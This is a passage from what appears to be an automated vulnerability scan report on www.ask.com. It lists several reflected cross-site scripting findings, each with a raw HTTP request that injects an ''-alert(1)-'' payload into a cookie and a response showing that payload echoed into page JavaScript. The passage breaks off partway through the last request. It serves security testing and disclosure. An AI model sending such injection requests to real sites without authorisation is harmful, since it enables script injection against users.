Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F399e5c'-alert(1)-'dada02f5bb1; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:47:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:47:42 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ3OjQyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:42 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:42 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 123276

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F399e5c'-alert(1)-'dada02f5bb1;u3=0;u2=;ord=-1326995325?" width="1" height="1" frameborder="0">
...[SNIP]...

3.562. http://www.ask.com/pictures [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictures

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc7ae'-alert(1)-'67644b0c25e was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /pictures HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3dc7ae'-alert(1)-'67644b0c25e; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:52 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:52 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:52 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 56743

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F3dc7ae'-alert(1)-'67644b0c25e;u3=0;u2=;ord=-1471463373?" width="1" height="1" frameborder="0">
...[SNIP]...

3.563. http://www.ask.com/pictures [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictures

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3f51'-alert(1)-'c98ef9a8c96 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /pictures?qsrc=167&o=0&l=dir&q=regulator+boat&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3d3f51'-alert(1)-'c98ef9a8c96; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:47:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:47:45 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ3OjQ1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:45 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:45 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 122998

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3d3f51'-alert(1)-'c98ef9a8c96;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-906503958?" width="1" height="1" frameborder="0">
...[SNIP]...

3.564. http://www.ask.com/pictures [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictures

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66567'-alert(1)-'66b6682653d was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /pictures HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F366567'-alert(1)-'66b6682653d; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:53 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjUzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:53 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:53 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 69195

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F366567'-alert(1)-'66b6682653d;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-993731717?" width="1" height="1" frameborder="0">
...[SNIP]...

3.565. http://www.ask.com/pictureslanding [user cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictureslanding

Issue detail

The value of the user cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6106d'-alert(1)-'f92bc21481 was submitted in the user cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /pictureslanding HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir6106d'-alert(1)-'f92bc21481; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:25 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjI1LVVUQw%3D%3D&po=0&pp=dir6106d%27-alert%281%29-%27f92bc21481; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:25 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:25 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:25 GMT; Path=/
Content-Length: 67171

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...

var _matchUrl = '/afc-match?q=&page=1&ac=24&qid=930D1C2A2E14D58E055D2683A734C8A9&qsrc=121&dm=all&qrt=2&lid=&o=0&l=dir6106d'-alert(1)-'f92bc21481';

_matchUrl+= "&userip=173.193.214.243";

_matchUrl+= "&wzinfo=no";

...[SNIP]...

3.566. http://www.ask.com/pictureslanding [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictureslanding

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 123d4'-alert(1)-'c8155c2f651 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /pictureslanding HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3123d4'-alert(1)-'c8155c2f651; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:06 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjA2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:06 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:06 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 69195

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F3123d4'-alert(1)-'c8155c2f651;u3=0;u2=;ord=-314933748?" width="1" height="1" frameborder="0">
...[SNIP]...

3.567. http://www.ask.com/pictureslanding [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictureslanding

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ba45'-alert(1)-'b669950cf09 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /pictureslanding HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F34ba45'-alert(1)-'b669950cf09; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:07 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:07 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:07 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 56740

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F34ba45'-alert(1)-'b669950cf09;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-477401491?" width="1" height="1" frameborder="0">
...[SNIP]...

3.568. http://www.ask.com/questionoftheday [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/questionoftheday

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91fe6'-alert(1)-'505367578f9 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /questionoftheday HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F391fe6'-alert(1)-'505367578f9; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:49 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjQ5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:49 GMT; Path=/
Content-Length: 51789

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F391fe6'-alert(1)-'505367578f9;u3=0;u2=;ord=-653782400?" width="1" height="1" frameborder="0">
...[SNIP]...

3.569. http://www.ask.com/questionoftheday [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/questionoftheday

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e2e6'-alert(1)-'e96646f8744 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /questionoftheday HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
